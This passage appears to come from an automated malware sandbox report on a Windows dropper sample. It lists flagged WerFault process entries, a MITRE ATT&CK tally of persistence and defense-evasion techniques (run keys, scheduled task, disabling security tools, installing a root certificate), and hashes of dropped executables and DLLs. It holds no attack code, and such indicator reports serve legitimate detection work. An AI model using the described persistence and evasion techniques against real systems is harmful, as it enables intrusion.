    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 16516 -ip 16516
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 1] C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -pss -s 704 -p 18908 -ip 18908
    - Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service: 2
- Registry Run Keys / Startup Folder: 2
- Scheduled Task: 1
Defense Evasion
- Modify Registry: 4
- Disabling Security Tools: 1
- Virtualization/Sandbox Evasion: 1
- Install Root Certificate: 1
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exeMD5
c1e332b4689009ed98cee69e3f4742bc
SHA144bcce8fa460cc1cee8e9e7fd5df3a39fd764566
SHA256ce02d9f8665492a499daee7bd48ec2301d319ed28a00cf2ac234858c6567fd97
SHA512177363326f26ed743baf1d28ba92efacc8e5cef7300b5547776031d9acf0ff07dba60156777bd84d16f2d847e0ed5bb15402d4aae1f091875746d016ff00171b
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exeMD5
c1e332b4689009ed98cee69e3f4742bc
SHA144bcce8fa460cc1cee8e9e7fd5df3a39fd764566
SHA256ce02d9f8665492a499daee7bd48ec2301d319ed28a00cf2ac234858c6567fd97
SHA512177363326f26ed743baf1d28ba92efacc8e5cef7300b5547776031d9acf0ff07dba60156777bd84d16f2d847e0ed5bb15402d4aae1f091875746d016ff00171b
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exeMD5
557ee240b0fb69b1483b663a7e82a3a0
SHA1ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA2567b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exeMD5
557ee240b0fb69b1483b663a7e82a3a0
SHA1ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA2567b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exeMD5
557ee240b0fb69b1483b663a7e82a3a0
SHA1ffe119d3a8fdea3b92010d48941b852b1f5925e8
SHA2567b7480a064aa06321c642dbd67bc33c12a19ef5110329316d66bfcb2e716f156
SHA512cde0738a634acfc709909353ac8f15379691573cc6a66d7400f2f6fb6f9027ed67055fe6615b309b7bd78cb1ad5c86cec2b511c151d35e2206743e31803f864e
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exeMD5
50865a36bb8878ae81177d2a9992e5ad
SHA1587114f63776c7bd89233256a9411ff2f1945408
SHA256cf62712f41c52efff40f392bf263581ce26f1a7d4be34d62938f570a1fc1bdf9
SHA51283137cd349848c1a48c1b6ffd1a90b9d47400ca7dcd2f12c7e003b32fcba86769cb3d0db4df3222d46ada72d0cdac079b52c3b484cdedeb4400e25f2e299572f
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exeMD5
50865a36bb8878ae81177d2a9992e5ad
SHA1587114f63776c7bd89233256a9411ff2f1945408
SHA256cf62712f41c52efff40f392bf263581ce26f1a7d4be34d62938f570a1fc1bdf9
SHA51283137cd349848c1a48c1b6ffd1a90b9d47400ca7dcd2f12c7e003b32fcba86769cb3d0db4df3222d46ada72d0cdac079b52c3b484cdedeb4400e25f2e299572f
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16dbfd538b0b.exeMD5
db0704c751bf67ade13097f085aa9506
SHA13979373e814a6d4733d48c008b196249cad01530
SHA256bacba08d3cb5b76c5686c41ecd56c0102823cfa58742b648cdf59ff1552aca53
SHA5123d415a30953f7c7aa6a2a55ba1f297c806475f2292a0f9cfdd8e8795a94b871cc04e4a736474cb438042a90faf8f0cbc0ba7f0e39c311f9997a0c95f6c8df863
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16dbfd538b0b.exeMD5
db0704c751bf67ade13097f085aa9506
SHA13979373e814a6d4733d48c008b196249cad01530
SHA256bacba08d3cb5b76c5686c41ecd56c0102823cfa58742b648cdf59ff1552aca53
SHA5123d415a30953f7c7aa6a2a55ba1f297c806475f2292a0f9cfdd8e8795a94b871cc04e4a736474cb438042a90faf8f0cbc0ba7f0e39c311f9997a0c95f6c8df863
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurl.dllMD5
d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libcurlpp.dllMD5
e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libgcc_s_dw2-1.dllMD5
9aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libstdc++-6.dllMD5
5e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\libwinpthread-1.dllMD5
1e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exeMD5
779acfdf9767e58af8fc934dbe7b4fdd
SHA186efb3b36f98b544b8e5aa247eac58318968d06b
SHA2565a22347d45bac57ccb557a4bdc9a3b8dbaec42daed268ac0d320df2dd7f71c95
SHA51285b8125744f53cad45c280eea0ea94ec144eb8fb16ddada43a207604185fa07f133c5729471c2d4bd71a084d55408e4d9d285f04815718ac24a0e617518df497
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exeMD5
779acfdf9767e58af8fc934dbe7b4fdd
SHA186efb3b36f98b544b8e5aa247eac58318968d06b
SHA2565a22347d45bac57ccb557a4bdc9a3b8dbaec42daed268ac0d320df2dd7f71c95
SHA51285b8125744f53cad45c280eea0ea94ec144eb8fb16ddada43a207604185fa07f133c5729471c2d4bd71a084d55408e4d9d285f04815718ac24a0e617518df497
-
C:\Users\Admin\AppData\Local\Temp\is-3J62I.tmp\idp.dllMD5
b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\idp.dllMD5
8f995688085bced38ba7795f60a5e1d3
SHA15b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35
-
C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exeMD5
48b0a9eff9c4934c0b0b8875b8867ac5
SHA18f90200031a93f1da51a981cb16c2e390158123e
SHA256d0c624cc9097fec7a90c4e893f84b2a35c54100acf2f16ac0aa026c8fcde9814
SHA51295200719627e371024ff2ccb4540245d7e95c7a384f4fa6cc6ad9e65f50d8331da077ff8ee7004d2268933e011d543eca0838a9c3e6fc8d66bb79640376cbff0
-
C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exeMD5
48b0a9eff9c4934c0b0b8875b8867ac5
SHA18f90200031a93f1da51a981cb16c2e390158123e
SHA256d0c624cc9097fec7a90c4e893f84b2a35c54100acf2f16ac0aa026c8fcde9814
SHA51295200719627e371024ff2ccb4540245d7e95c7a384f4fa6cc6ad9e65f50d8331da077ff8ee7004d2268933e011d543eca0838a9c3e6fc8d66bb79640376cbff0
-
C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmpMD5
9303156631ee2436db23827e27337be4
SHA1018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA5129fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmpMD5
9303156631ee2436db23827e27337be4
SHA1018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA5129fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmpMD5
9303156631ee2436db23827e27337be4
SHA1018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA5129fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmpMD5
9303156631ee2436db23827e27337be4
SHA1018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA5129fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\idp.dllMD5
b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmpMD5
8f6ef423702ebc05cbda65082d75d9aa
SHA16d33ebe347f2146c44b38a1d09df9da5486f8838
SHA25653a9969226555706a2ee3d0a1e455c5f4231329fe51eeb0b2e5de41195c95284
SHA512b853a40d6f1b3acb55877e2fd0c4f48181ab84547bea9845c8a713cf5f011e744ba8ff278f491a00378975f9f097fddab05aa7425fd52836ada7eabc047fc227
-
C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmpMD5
8f6ef423702ebc05cbda65082d75d9aa
SHA16d33ebe347f2146c44b38a1d09df9da5486f8838
SHA25653a9969226555706a2ee3d0a1e455c5f4231329fe51eeb0b2e5de41195c95284
SHA512b853a40d6f1b3acb55877e2fd0c4f48181ab84547bea9845c8a713cf5f011e744ba8ff278f491a00378975f9f097fddab05aa7425fd52836ada7eabc047fc227
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
5a2eb5f00d7d0d29d1d792c69163ba02
SHA12642bc2edd1bb8536fe6a76dde561453a1e66424
SHA2566b33a18c9bf86657a478f581445ca4ad3a5d58def341b61b24feb9cb47fd7367
SHA512573cf8e307bee294b2c26cb89486a7e3cda593b26343aaf28d5eedebc4ee2e82808767581c35503712b8be28c25e5efbe121d263c67561a92e7f69342b3a2e17
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
5a2eb5f00d7d0d29d1d792c69163ba02
SHA12642bc2edd1bb8536fe6a76dde561453a1e66424
SHA2566b33a18c9bf86657a478f581445ca4ad3a5d58def341b61b24feb9cb47fd7367
SHA512573cf8e307bee294b2c26cb89486a7e3cda593b26343aaf28d5eedebc4ee2e82808767581c35503712b8be28c25e5efbe121d263c67561a92e7f69342b3a2e17
-
C:\Users\Admin\Documents\VfIkgF5mtQoaCdFoT9WiAeXX.dllMD5
74ad528eb7a59567e745fd4894f2d458
SHA1e10ef14d99de75767bd7606a763459dcb1cda615
SHA256e646ba9aceccd8ed77ac74abd4c92273669ccad62972c3b5f7b7203db3a6c20a
SHA512b3344ff77afe7aae7b45e2a87e786664e1b5d341d6e1c7b8a1faab879896f805b9ef39d34948821e476ebd88cdff53d64c95b17e8dce478f7d8b9ce382f98b7c
-